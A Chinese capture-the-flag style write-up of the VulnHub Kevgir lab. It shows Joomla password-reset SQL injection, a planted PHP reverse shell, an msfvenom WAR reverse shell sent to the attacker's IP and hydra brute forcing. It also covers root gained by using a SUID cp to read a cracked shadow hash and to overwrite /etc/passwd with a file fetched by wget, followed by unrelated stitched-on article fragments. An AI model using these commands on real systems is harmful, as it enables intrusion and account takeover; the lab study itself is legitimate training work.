技术标签: vulnhub
个人博客地址
http://www.darkerbox.com
欢迎大家学习交流
靶机网址:
https://www.vulnhub.com/entry/kevgir-1,137/
靶机知识点:
靶机IP:192.168.34.170
kali IP:192.168.34.80
nmap -sV -p- 192.168.34.170
端口有点多。
有4个http服务:80,8080,8081,9000,
80:
8080:tomcat
8081:Joom
9000:
有四个漏洞。
先写第一个
8081端口
joomscan -u http://192.168.34.170:8081/
扫出很多CVE。有网址,看看。我用的下图这个CVE。
https://www.exploit-db.com/exploits/6234
网址下面有例子,
访问:http://192.168.34.170:8081/index.php?option=com_user&view=reset&layout=confirm
输入一个单引号,点击提交
跳转到重置密码页面。我修改密码为123456
重置密码后,
访问:http://192.168.34.170:8081/administrator/
登录
成功登录,寻找可以反弹shell的地方
添加了一个文章,但找了半天也没找见路径
然后看wp才找见这个地方。
点击beez。edit-html。
这里提示了路径
修为文件内容反弹shell。我用的kali下的/usr/share/webshells/php/php-reverse-shell.php,修改$Ip为kali ip
应用保存一下
访问这个页面
得到shell
nikto扫8080端口
nikto -h http://192.168.34.170:8080
有tomcat弱口令tomcat:tomcat
,并找到管理页
有上传war文件的地方。
使用msfvenom生成war格式的payload。
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.34.80 LPORT=6666 -f war>r_jsp_shell_6666.war
上传文件
访问
hydra爆破ftp的用户名密码,用户名用的是seclists,密码用的是密码,我将密码放到了seclists/Passwords/下面。
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/passwords_john.txt 192.168.34.170 ftp -s 25
几分钟爆出了账号和密码
ssh远程连接即可。
这里是针对方式一反弹的shell。其他没有尝试
先反弹个tty。
python -c 'import pty;pty.spawn("/bin/bash")'
找sudi权限的文件
find / -perm -u=s 2>/dev/null
发现有cp命令。
使用cp命令将/etc/shadow文件复制到/tmp下面就可以查看shadow文件了
在shadow中发现了两个用户
将admin用户复制到kali里。
admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7
使用john爆破:
爆出密码是admin。
但是我们并没有获取root权限。
我在kali创建了一个用户admin,并修改/etc/passwd文件,将uid和gid修改为.
kali使用python搭建简易服务器,默认是8000端口
cd /etc
python3 -m http.server
靶机下载
cd /tmp
wget http://192.168.34.80:8000/passwd
cp passwd /etc/passwd
su admin
得到root权限
欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群
漏洞原理log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。影响版本Log4j2.x<=2.14.1漏洞复现漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ准备环境把受影响的jar包拖进随手创建的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)jdk版本最好&
文章目录1 网站资源2 前言3 Windows安装3.1免安装版本安装步骤1:点击 [windows 免安装版:https://dev.mysql.com/downloads/mysql/](https://dev.mysql.com/downloads/mysql/)步骤2:下载压缩包步骤3:解压 mysql-8.0.16-winx64.zip,放在 D:\Program Files\mysql...
嗨!朋友,我是沐沐欢迎你来到学习python的宝藏基地~~长按下方二维码可以添加我为好友哦相信大家对进度条一定不陌生了,比如在我们安装python库的时候可以看到下载的进度,此外在下载文件时也可以看到类似的进度条,比如下图这种:应用场景:下载文件、任务计时等今天辰哥就给大家分享Python的6种不同的实现实时显示处理进度的方式,文中每一种方式都附带一个案例,并提供官方文档,供大家学习,自定义去修改。第1种:普通进度条利用打印功能print进行实时刷新显示for i in ran
1、下载地址:https://www.sublimerge.com/sm3/docs/quick-start.html#installation2、将下载的文件放在Sublime Text 3安装目录下:..\Sublime Text 3\Packages\3、重启Sublime Text 3,鼠标右键菜单栏有Sublimerge选项。...
http://www.uml.org.cn/sjms/200442724.htm这篇文章由grid liu发表在grid liu在IT先锋中担任资深顾问,负责J2EE技术的顾问咨询和培训工作。摘要 JUnit是一个优秀的Java单元测试框架,由两位世界级软件大师Erich Gamma 和 Kent Beck共同开发完成。本文将向读者介绍
最近更新时间:2017年7月5日17:25:46 现在的前端工程师职责越来越重要,很多新的技术都是从前端领域分离出来,微信小程序就是一个很好的前端技术的实践。开发微信小程序前,总觉得神秘面纱不可及,但经过前端团队一个月辛苦奋战,微信小程序从此不再陌生,而变得熟悉和可控。现在,小程序终于上线了,我也终于有时间来分享一下开发过程中遇到的问题。0、开发过程中需要遵守的两
刚刚考完,参考答案,欢迎斧正!A,B相同的准备工作准备工作: 开两个cmd其中一个: sqlplus sys/123456 as sysdba; alter user scott account unlock;另一个: sqlplus scott/tiger;A卷题解1.请完成以下sql...
我正在尝试将我从ebay API获得的GMT时间转换为特定时区,具体取决于我的应用程序托管位置,以便我可以转换并获取正确的日期(因为它们实际上在ebay以及交易)。我试图这样做的方式:DateTime convertedDate = DateTime.SpecifyKind(DateTime.Parse(doc2.GetElementsByTagName("CreatedTime").Item(i...
如果有abcd,at end of B,是对B以及B之前的字段进行判断不是仅仅对b进行判断,而且如果at end of b,就会对b后面的数据清空初始化,所以在at end of 前用 另一个工作区接收一下,一定注意,是B之前的所有字段进行判断at new也一样例子:REPORTzlm_at_end_of.TYPES:BEGINOFty_it...
OPEN AI LAB(开放智能)于7月6日正式开源拥有自主知识产权的全新下一代AI端侧推理框架Tengine-Lite。作为Tengine整体软件架构重构的全新下一代产品,Tengin...
前言本文将详解如何在群晖NAS中利用Web Station安装配置typecho博客.Typecho是由type和echo两个词合成的,来自于开发团队的头脑风暴。Typecho基于PHP5开发,支持多种数据库,是一款内核强健﹑扩展方便﹑体验友好﹑运行流畅的轻量级开源博客程序。选用Typecho,搭建独一无二个人网络日志发布平台,享受创作的快乐。Typecho官方网站本文为Stille原创文章.经实...
一道简单题题目朴素的想一想,直接枚举[l,r]就好了,当然会T。那就优化一下呗。考虑一个数的荒谬值,发现大概只与长度有关,我们每次就不加1,0前面的那一个数加1,语文不好233。举个栗子:1234500之后就成了1234600,这样就很快了(貌似有更快做法)。没有代码